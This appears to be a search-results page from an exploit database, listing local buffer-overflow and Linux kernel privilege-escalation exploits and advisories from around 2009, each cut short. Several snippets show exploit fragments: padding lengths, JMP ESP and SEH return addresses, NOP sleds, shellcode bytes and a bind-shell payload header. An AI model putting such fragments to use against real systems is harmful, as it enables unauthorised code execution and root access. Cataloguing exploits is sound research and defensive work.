4067 matches found
Easy RM to MP3 2.7.3.700 - Local Overflow
!/usr/bin/ruby breakit = "\x41" 26109 jump = "\x3a\xf2\xaa\x01" padit = "\x90" 25 01AAF23A FFE4 JMP ESP MSRMCcodec02.dll finishhim = "\xdd\xc5\xd9\x74\x24\xf4\x58\xbf\x27\x98\xb6\xfc\x31\xc9" + "\xb1\x32\x31\x78\x17\x83\xe8\xfc\x03\x5f\x8b\x54\x09\x63" +...
Linux 2.6.x fs/pipe.c local root exploit
No description provided by source. For those who were not yet aware, there are at least 3 public exploits since 11/05/2009 for CVE-2009-3547 targeting all Linux kernels from 2.6.0 to 2.6.31 included. Since spender and fotis have already released their own, there is no need for us to keep this on o...
Linux Kernel 2.6.x - 'pipe.c' Local Privilege Escalation (2)
/ source: https://www.securityfocus.com/bid/36901/info Linux kernel is prone to a local privilege-escalation vulnerability that is caused by a NULL-pointer dereference. Local attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result i...
CVE-2009-3640
CVE-2009-3640 affects the Linux kernel KVM component (arch/x86/kvm/x86.c). The update_cr8_intercept function does not properly handle a missing APIC, causing a local denial of service via a NULL pointer dereference and, potentially, privilege escalation through kvm_vcpu_ioctl. Affected: kernels bef...
Alleycode HTML Editor 2.2.1 - Local Buffer Overflow
!/usr/bin/env python Alleycode HTML Editor 2.21 Local .HTML Overflow Exploit SEH Coded By: DrIDE Found By: Rafael de Sousa Tested On: XPSP0 SP3 doesn't have any usable P/P/R Download: www.alleycode.com calc.exe - 303 bytes Encoder - alpha/upper EXITFUNC - SEH sc =...
PT-2009-4922 · Microsoft · Windows Server 2003 +5
Name of the Vulnerable Software and Affected Versions: Microsoft Windows versions prior to the fixed version Description: The issue is caused by an integer underflow in the kernel, allowing local users to gain privileges via a crafted application. This occurs due to the incorrect truncation of a...
Free WMA MP3 Converter 1.1 Buffer Overflow
!/usr/bin/perl Free WMA MP3 Converter v1.1 .wav Local Buffer Overflow seh Vendor: http://www.eusing.com/ Discovered by: KriPpLer http://www.x-sploited.com/ Tested on: Windows XP Pro SP2. Description: FREE WMA MP3 converter v1.1 Local Buffer Overflow Exploit SEH This application is vulnerable to a...
FreeBSD-SA-09:14.devfs
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ============================================================================= FreeBSD-SA-09:14.devfs Security Advisory The FreeBSD Project Topic: Devfs / VFS NULL pointer race condition Category: core Module: kern Announced: 2009-10-02 Credits:...
Winplot (.wp2 File) Local Buffer Overflow Exploit
Exploit for unknown platform in category local exploits ================================================= Winplot .wp2 File Local Buffer Overflow Exploit ================================================= Author: Rick Software: http://math.exeter.edu/rparris/peanut/wp32z.exe Version: Compiled in 1...
SAP Player 0.9 (.pla) Universal Local Buffer Overflow Exploit (SEH)
Exploit for unknown platform in category local exploits =================================================================== SAP Player 0.9 .pla Universal Local Buffer Overflow Exploit SEH =================================================================== !/usr/bin/python SAP player 0.9 .pla...
MP3 Studio 1.0 (.m3u File) Local Buffer Overflow Exploit
Exploit for unknown platform in category local exploits ======================================================== MP3 Studio 1.0 .m3u File Local Buffer Overflow Exploit ======================================================== / mplode.c vs MP3 Studio v1.0 Tested on: Windows 2000 SP4 Author: Domini...
Invisible Browsing 5.0.52 - '.ibkey' Local Buffer Overflow
!/usr/bin/perl print qq Iranian Pentesters Home Www.Pentesters.Ir PLATEN - H.jafari - Invisible Browsing 5.0.52 .ibkey Local BoF Exploit bug found & exploited by: PLATEN E-mail && blog: hjafari.blogspot.com platen.secureatgmaildotcom Greetings: Cru3l.b0y, b3hz4d, Cdef3nder and all members in...
jetAudio 7.1.9.4030 plus - vx(asxwaxwvx) Universal Local Buffer Overflow (SEH)
jetAudio 7.1.9.4030 plus - vxasxwaxwvx Universal Local Buffer Overflow SEH !/usr/bin/perl Found By :: HACK4LOVE [email protected] jetAudio v 7.1.9.4030 plus vxasx/wax/wvxUniversal Local BOF SEH use--open file--hac4love.asx after that just move the mouse to information box in the jetAudio...
GemStone/S 6.3.1 (stoned) Local Buffer Overflow Exploit
Exploit for linux platform in category local exploits ======================================================= GemStone/S 6.3.1 stoned Local Buffer Overflow Exploit ======================================================= / wonderfulcaricatureofexploitability.c AKA GemStone/S 6.3.1 "stoned" Local...
OtsTurntables 1.00.027 - '.m3u' / '.ofl' Universal Local Buffer Overflow (SEH)
!/usr/bin/perl by hack4love [email protected] OtsTurntables Free 1.00.027 .m3u/ ofl File Local Universal BOF Exploit SEH --- info:: 1.00.027 was released 3 March 2008 http://www.brothersoft.com/otsturntables-free-download-86957.html Original exploit::http://www.milw0rm.com/exploits/8371 my...
Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit
No description provided by source. / hoagieudpsendmsg.c LOCAL LINUX KERNEL ROOT EXPLOIT 2.6.19 - CVE-2009-2698 udpsendmsg bug exploit via output callback function used in dstentry / rtable Bug reported by Tavis Ormandy and Julien Tinnes of the Google Security Team Tested with Debian Etch r0 $ cat...
dTunes 2.72 (Filename Processing) Local Format String PoC
No description provided by source. !/usr/bin/perl dTunes 2.72 local format string PoC filename processing TheLeader, GSOG2009 st0p hotmail sp4m com ShoutZ to the wonderful ppl over at forums.hacking.org.il = Copy the file over to your device on /var/mobile/Library/Downloads/ and attempt playing...
dTunes 2.72 - Filename Processing Local Format String (PoC)
!/usr/bin/perl dTunes 2.72 local format string PoC filename processing TheLeader, GSOG2009 st0p hotmail sp4m com ShoutZ to the wonderful ppl over at forums.hacking.org.il = Copy the file over to your device on /var/mobile/Library/Downloads/ and attempt playing with dTunes. This can also be done...
Swift Ultralite 1.032 - .m3u Local Buffer Overflow (PoC)
Swift Ultralite 1.032 - .m3u Local Buffer Overflow PoC !/usr/bin/perl Found By :: HACK4LOVE [email protected] Swift Ultralite 1.032 .M3U Local Buffer Overflow PoC EAX 00000000 ECX FFFFFFFF EDX 004976F0 SwiftUlt.004976F0 EBX 00000270 ESP 0013F1CC EBP 00000000 ESI 0013F31B...
PIPL 2.5.0 Buffer Overflow
!/usr/bin/python PIPL print "+ Pipl 2.5.0 local exploit" bof="\x41" 4108 nsh="\xEB\x06\x90\x90" seh="\x17\x07\x01\x10" xaudio.dll ppr nops="\x90" 20 win32bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum http://metasploit.com / sc =...